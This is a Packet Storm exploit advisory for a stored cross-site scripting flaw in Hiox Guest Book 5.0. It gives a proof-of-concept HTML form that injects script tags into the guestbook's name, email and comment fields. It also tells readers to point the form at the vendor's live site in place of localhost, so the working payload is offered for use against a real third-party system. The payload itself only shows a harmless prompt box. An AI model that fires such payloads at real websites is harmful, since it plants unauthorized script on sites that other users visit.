Hiox Guest Book 5.0 Cross Site Scripting

2014-01-05T00:00:00
ID PACKETSTORM:124681
Type packetstorm
Reporter JoKeR_StEx
Modified 2014-01-05T00:00:00

Description

                                        
                                            `#############################################################################  
  
# Exploit Title : HIOX GUEST BOOK 5.0 (HGB-5.0) Cross Site Scripting   
  
# Author : JoKeR_StEx   
  
# Tested On : Windows   
  
# Download Software Link : www.hscripts.com/scripts/php/downloads/HGB.zip  
  
# Date : 03/01/2014  
  
#############################################################################  
[+] P.O.C  
  
<form action="http://127.0.0.1/HGB/add.php" method="POST">  
<!--In Name -->  
<input type="hidden" name="name1" value=""><script>prompt('JoKeR_StEx')</script>">  
<!-- In Email -->  
<input type="hidden" name="email" value=""><script>prompt('xss (email)')</script>">  
<!-- in comment -->  
<input type="hidden" name="cmt" value=""><script>prompt('xss (comment)')</script>">  
</form>  
  
[+] For test The Exploit (Example)   
  
ex:http://www.hscripts.com/scripts/php/HGB/add.php  
  
Just Replace http://127.0.0.1/HGB/add.php by http://www.hscripts.com/scripts/php/HGB/add.php ^___^  
  
################################################################################  
# Gr33t'z To : Asesino04 , Shield Dz , & All My Friends & All Algerians   
################################################################################  
email : jokerdz44@yahoo.fr  
Facebook : fb.me/imadlilong.lasvegas  
twitter : @JoKeR_StEx  
  
  
  
`